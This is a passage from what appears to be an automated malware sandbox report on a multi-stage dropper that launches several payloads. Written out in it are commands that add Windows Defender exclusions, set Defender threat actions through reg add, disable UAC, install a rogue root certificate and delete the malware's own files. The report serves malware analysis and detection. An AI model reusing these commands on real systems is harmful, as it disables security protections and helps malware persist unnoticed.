\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UlrnSVu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Processes:
svhoost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 svhoost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 svhoost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeaxplont.exeaxplont.exeOne.exeRegAsm.exesvhoost.exepowershell.exeCqbMuGXXSYnmsrDGhRReY2eq.exeZI4lHeOwb0r6iUPqytb0Zmzf.exefileosn.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEaxplont.exeAddInProcess32.exepowershell.exeUlrnSVu.exepid process 3608 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe 3608 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe 3756 axplont.exe 3756 axplont.exe 2196 axplont.exe 2196 axplont.exe 532 One.exe 532 One.exe 1964 RegAsm.exe 1964 RegAsm.exe 4300 svhoost.exe 4300 svhoost.exe 4300 svhoost.exe 4300 svhoost.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 2928 CqbMuGXXSYnmsrDGhRReY2eq.exe 2928 CqbMuGXXSYnmsrDGhRReY2eq.exe 2928 CqbMuGXXSYnmsrDGhRReY2eq.exe 2928 CqbMuGXXSYnmsrDGhRReY2eq.exe 4300 svhoost.exe 4300 svhoost.exe 3356 ZI4lHeOwb0r6iUPqytb0Zmzf.exe 3356 ZI4lHeOwb0r6iUPqytb0Zmzf.exe 1540 fileosn.exe 1540 fileosn.exe 1540 fileosn.exe 1540 fileosn.exe 1540 fileosn.exe 1540 fileosn.exe 3356 ZI4lHeOwb0r6iUPqytb0Zmzf.exe 1520 powershell.exe 1520 powershell.exe 1520 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 456 powershell.EXE 456 powershell.EXE 456 powershell.EXE 3940 axplont.exe 3940 axplont.exe 3676 AddInProcess32.exe 3676 AddInProcess32.exe 3676 AddInProcess32.exe 2072 powershell.exe 2072 powershell.exe 2072 powershell.exe 4344 UlrnSVu.exe 4344 UlrnSVu.exe 4344 UlrnSVu.exe 4344 UlrnSVu.exe 4344 UlrnSVu.exe 4344 UlrnSVu.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
One.exefile300un.exeAddInProcess32.exepowershell.exeZI4lHeOwb0r6iUPqytb0Zmzf.exeCqbMuGXXSYnmsrDGhRReY2eq.exesvhoost.exeRegAsm.exefileosn.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.EXEAddInProcess32.exepowershell.exedescription pid process Token: SeDebugPrivilege 532 One.exe Token: SeBackupPrivilege 532 One.exe Token: SeSecurityPrivilege 532 One.exe Token: SeSecurityPrivilege 532 One.exe Token: SeSecurityPrivilege 532 One.exe Token: SeSecurityPrivilege 532 One.exe Token: SeDebugPrivilege 4236 file300un.exe Token: SeDebugPrivilege 4864 AddInProcess32.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 3356 ZI4lHeOwb0r6iUPqytb0Zmzf.exe Token: SeManageVolumePrivilege 2928 CqbMuGXXSYnmsrDGhRReY2eq.exe Token: SeDebugPrivilege 4300 svhoost.exe Token: SeDebugPrivilege 4080 RegAsm.exe Token: SeDebugPrivilege 1540 fileosn.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeIncreaseQuotaPrivilege 1656 WMIC.exe Token: SeSecurityPrivilege 1656 WMIC.exe Token: SeTakeOwnershipPrivilege 1656 WMIC.exe Token: SeLoadDriverPrivilege 1656 WMIC.exe Token: SeSystemProfilePrivilege 1656 WMIC.exe Token: SeSystemtimePrivilege 1656 WMIC.exe Token: SeProfSingleProcessPrivilege 1656 WMIC.exe Token: SeIncBasePriorityPrivilege 1656 WMIC.exe Token: SeCreatePagefilePrivilege 1656 WMIC.exe Token: SeBackupPrivilege 1656 WMIC.exe Token: SeRestorePrivilege 1656 WMIC.exe Token: SeShutdownPrivilege 1656 WMIC.exe Token: SeDebugPrivilege 1656 WMIC.exe Token: SeSystemEnvironmentPrivilege 1656 WMIC.exe Token: SeRemoteShutdownPrivilege 1656 WMIC.exe Token: SeUndockPrivilege 1656 WMIC.exe Token: SeManageVolumePrivilege 1656 WMIC.exe Token: 33 1656 WMIC.exe Token: 34 1656 WMIC.exe Token: 35 1656 WMIC.exe Token: 36 1656 WMIC.exe Token: SeIncreaseQuotaPrivilege 1656 WMIC.exe Token: SeSecurityPrivilege 1656 WMIC.exe Token: SeTakeOwnershipPrivilege 1656 WMIC.exe Token: SeLoadDriverPrivilege 1656 WMIC.exe Token: SeSystemProfilePrivilege 1656 WMIC.exe Token: SeSystemtimePrivilege 1656 WMIC.exe Token: SeProfSingleProcessPrivilege 1656 WMIC.exe Token: SeIncBasePriorityPrivilege 1656 WMIC.exe Token: SeCreatePagefilePrivilege 1656 WMIC.exe Token: SeBackupPrivilege 1656 WMIC.exe Token: SeRestorePrivilege 1656 WMIC.exe Token: SeShutdownPrivilege 1656 WMIC.exe Token: SeDebugPrivilege 1656 WMIC.exe Token: SeSystemEnvironmentPrivilege 1656 WMIC.exe Token: SeRemoteShutdownPrivilege 1656 WMIC.exe Token: SeUndockPrivilege 1656 WMIC.exe Token: SeManageVolumePrivilege 1656 WMIC.exe Token: 33 1656 WMIC.exe Token: 34 1656 WMIC.exe Token: 35 1656 WMIC.exe Token: 36 1656 WMIC.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 456 powershell.EXE Token: SeDebugPrivilege 3676 AddInProcess32.exe Token: SeDebugPrivilege 2072 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
OzCJJYF8vrJ47OtL4AJuVf5O.exepid process 4452 OzCJJYF8vrJ47OtL4AJuVf5O.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
OzCJJYF8vrJ47OtL4AJuVf5O.exepid process 4452 OzCJJYF8vrJ47OtL4AJuVf5O.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeaxplont.exe33333.exeRegAsm.exelumma1234.exegold.exeswizzzz.exedescription pid process target process PID 3608 wrote to memory of 3756 3608 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe axplont.exe PID 3608 wrote to memory of 3756 3608 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe axplont.exe PID 3608 wrote to memory of 3756 3608 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe axplont.exe PID 3756 wrote to memory of 856 3756 axplont.exe 33333.exe PID 3756 wrote to memory of 856 3756 axplont.exe 33333.exe PID 3756 wrote to memory of 856 3756 axplont.exe 33333.exe PID 856 wrote to memory of 4556 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4556 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4556 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 856 wrote to memory of 4080 856 33333.exe RegAsm.exe PID 4080 wrote to memory of 4300 4080 RegAsm.exe svhoost.exe PID 4080 wrote to memory of 4300 4080 RegAsm.exe svhoost.exe PID 4080 wrote to memory of 4300 4080 RegAsm.exe svhoost.exe PID 4080 wrote to memory of 532 4080 RegAsm.exe One.exe PID 4080 wrote to memory of 532 4080 RegAsm.exe One.exe PID 3756 wrote to memory of 1540 3756 axplont.exe fileosn.exe PID 3756 wrote to memory of 1540 3756 axplont.exe fileosn.exe PID 3756 wrote to memory of 1540 3756 axplont.exe fileosn.exe PID 3756 wrote to memory of 4128 3756 axplont.exe lumma1234.exe PID 3756 wrote to memory of 4128 3756 axplont.exe lumma1234.exe PID 3756 wrote to memory of 4128 3756 axplont.exe lumma1234.exe PID 4128 wrote to memory of 4864 4128 lumma1234.exe AddInProcess32.exe PID 4128 wrote to memory of 4864 4128 lumma1234.exe AddInProcess32.exe PID 4128 wrote to memory of 4864 4128 lumma1234.exe AddInProcess32.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 4128 wrote to memory of 1836 4128 lumma1234.exe RegAsm.exe PID 3756 wrote to memory of 5112 3756 axplont.exe gold.exe PID 3756 wrote to memory of 5112 3756 axplont.exe gold.exe PID 3756 wrote to memory of 5112 3756 axplont.exe gold.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 5112 wrote to memory of 4604 5112 gold.exe RegAsm.exe PID 3756 wrote to memory of 1196 3756 axplont.exe swizzzz.exe PID 3756 wrote to memory of 1196 3756 axplont.exe swizzzz.exe PID 3756 wrote to memory of 1196 3756 axplont.exe swizzzz.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe PID 1196 wrote to memory of 1964 1196 swizzzz.exe RegAsm.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe"C:\Users\Admin\AppData\Local\Temp\6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"5⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 2724⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 2804⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"3⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\ZI4lHeOwb0r6iUPqytb0Zmzf.exe"C:\Users\Admin\Pictures\ZI4lHeOwb0r6iUPqytb0Zmzf.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\Pictures\CqbMuGXXSYnmsrDGhRReY2eq.exe"C:\Users\Admin\Pictures\CqbMuGXXSYnmsrDGhRReY2eq.exe" /s5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\OFc2WnlpNqXfMh1hYCXLEe7X.exe"C:\Users\Admin\Pictures\OFc2WnlpNqXfMh1hYCXLEe7X.exe"5⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\OzCJJYF8vrJ47OtL4AJuVf5O.exe"C:\Users\Admin\Pictures\OzCJJYF8vrJ47OtL4AJuVf5O.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Pictures\Zavb7AcxYw6gQwgm1dXI4U2n.exe"C:\Users\Admin\Pictures\Zavb7AcxYw6gQwgm1dXI4U2n.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD4B5.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exe.\Install.exe /NQHxdidUQs "385118" /S7⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
-
